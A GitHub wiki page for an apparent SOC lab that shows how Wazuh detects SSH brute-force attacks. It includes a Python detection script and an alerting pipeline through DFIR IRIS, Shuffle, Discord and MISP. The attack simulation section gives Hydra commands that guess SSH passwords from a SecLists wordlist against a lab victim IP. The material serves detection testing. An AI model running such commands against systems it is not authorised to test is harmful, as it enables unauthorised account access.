Brute‐force Proof Of Concept - socarium/makarasoc GitHub Wiki

Detecting Brute-force

Brute-force is a common attack vector that attackers use to gain unauthorized access to endpoints and services. Services like SSH on Linux endpoints are usually prone to brute-force attacks. Wazuh identifies brute-force attacks by correlating multiple authentication failure events from the same source within a short time window.
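To make the correlation concrete, here is an added example (not part of the makarasoc wiki or Wazuh's own code) that parses constructed sshd lines in the syslog format Ubuntu writes to /var/log/auth.log and applies a per-source-IP sliding-window count. The source IP 192.168.1.20, the sample timestamps, and the threshold of 8 failures within 120 seconds are assumptions chosen for this example; they follow the frequency/timeframe/same-source-IP model of Wazuh's sshd rules, but the values in a deployed ruleset should be checked rather than taken from here.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of /var/log/auth.log on the victim endpoint. The attacker
# address 192.168.1.20, the user "soc" and the timestamps are invented for this example.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 victim sshd[1201]: Failed password for soc from 192.168.1.20 port 40001 ssh2
Mar  3 10:15:02 victim sshd[1202]: Failed password for soc from 192.168.1.20 port 40002 ssh2
Mar  3 10:15:03 victim sshd[1203]: Failed password for soc from 192.168.1.20 port 40003 ssh2
Mar  3 10:15:04 victim sshd[1204]: Failed password for soc from 192.168.1.20 port 40004 ssh2
Mar  3 10:15:05 victim sshd[1205]: Failed password for soc from 192.168.1.20 port 40005 ssh2
Mar  3 10:15:06 victim sshd[1206]: Failed password for soc from 192.168.1.20 port 40006 ssh2
Mar  3 10:15:07 victim sshd[1207]: Failed password for soc from 192.168.1.20 port 40007 ssh2
Mar  3 10:15:08 victim sshd[1208]: Failed password for soc from 192.168.1.20 port 40008 ssh2
Mar  3 10:15:09 victim sshd[1209]: Failed password for soc from 192.168.1.20 port 40009 ssh2
Mar  3 10:15:10 victim sshd[1210]: Accepted password for soc from 192.168.1.20 port 40010 ssh2
Mar  3 10:20:00 victim sshd[1300]: Failed password for invalid user admin from 10.0.0.5 port 51000 ssh2
Mar  3 10:25:00 victim sshd[1301]: Failed password for invalid user admin from 10.0.0.5 port 51001 ssh2
Mar  3 10:30:00 victim sshd[1302]: Failed password for invalid user admin from 10.0.0.5 port 51002 ssh2
"""

# Syslog envelope: "Mon dd HH:MM:SS host sshd[pid]: message"
SYSLOG_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: (?P<msg>.*)$')
# sshd failure message, with or without the "invalid user" marker
FAILED_RE = re.compile(
    r'^Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+')


def parse_auth_failures(text, year=2024):
    """Return a list of (timestamp, user, source_ip) for each sshd 'Failed password' line.

    Syslog timestamps carry no year, so one is supplied by the caller.
    """
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        f = FAILED_RE.match(m.group('msg'))
        if not f:
            continue  # accepted logins and other sshd messages are not failures
        ts_text = ' '.join(m.group('ts').split())  # collapse the day padding "Mar  3"
        ts = datetime.strptime(f"{year} {ts_text}", "%Y %b %d %H:%M:%S")
        events.append((ts, f.group('user'), f.group('ip')))
    return events


def detect_bruteforce(events, threshold=8, timeframe=120):
    """Raise one alert per source IP each time it accumulates `threshold` failures
    within `timeframe` seconds (same model as a frequency/timeframe rule with
    same_source_ip). The window is reset after an alert so a long attack produces
    one alert per burst instead of one per additional failure."""
    windows = defaultdict(deque)
    alerts = []
    for ts, user, ip in sorted(events):
        window = windows[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > timeframe:
            window.popleft()  # drop failures that fell out of the time window
        if len(window) >= threshold:
            alerts.append({
                'source_ip': ip,
                'user': user,
                'count': len(window),
                'first': window[0],
                'last': ts,
            })
            window.clear()
    return alerts


def run_example():
    """Run the detector over the constructed sample log and return its alerts."""
    return detect_bruteforce(parse_auth_failures(SAMPLE_AUTH_LOG))


if __name__ == '__main__':
    for alert in run_example():
        print(f"brute-force: {alert['count']} failures from {alert['source_ip']} "
              f"between {alert['first']:%H:%M:%S} and {alert['last']:%H:%M:%S}")
```

With the sample above, the nine rapid failures from 192.168.1.20 trigger a single alert at the eighth failure, while the three failures from 10.0.0.5 spaced five minutes apart never reach the threshold; the accepted login is ignored by the parser. The same window logic would flag a slow attacker only if the timeframe is widened, which is the usual trade-off when tuning such a rule.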


Infrastructure Required

Endpoint              Description
Ubuntu / Kali Linux   Attacker endpoint that performs the brute-force attack.
Ubuntu 24.04          Victim endpoint of the brute-force attack; it is required to have an SSH server installed and enabled.

Perform the following steps to configure the Ubuntu endpoint; this allows it to generate authentication failure attempts against the monitored victim endpoint.

  • On the attacker endpoint, install Hydra and use it to execute the brute-force attack:
sudo apt update
sudo apt install hydra -y
  • Clone the SecLists repository by Daniel Miessler; the download time depends on your internet connection:
git clone https://github.com/danielmiessler/SecLists.git

Attack Simulation

Run Hydra from the attacker endpoint to execute brute-force attacks against the victim endpoint. To do this, replace <victim_ip> with the IP address of the victim endpoint and run the command below:

sudo hydra -l <username> -P <pass-list.txt> <victim_ip> ssh

Here is an example command from the attacker against the victim (username: soc, victim IP: 192.168.1.12).

sudo hydra -l soc -P SecLists/Passwords/days.txt 192.168.1.12 ssh

Here is the evidence that the victim endpoint already has the Wazuh agent installed.

The Alerts

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Threat Hunting module and open the events view.

Evidence of the alerts forwarded from Wazuh to DFIR IRIS.

DFIR IRIS automatically creates a case when a specific Wazuh rule ID is hit.

The SOAR workflow process.

Evidence of the cases that are created automatically by the Shuffle automation.

Evidence from Discord of the notification alert that matches the SOAR workflow.

For the MISP intel step, if the IOC does not match the MISP feeds, the response is null.

Here is a notification example for when the IOC matches the MISP feeds.
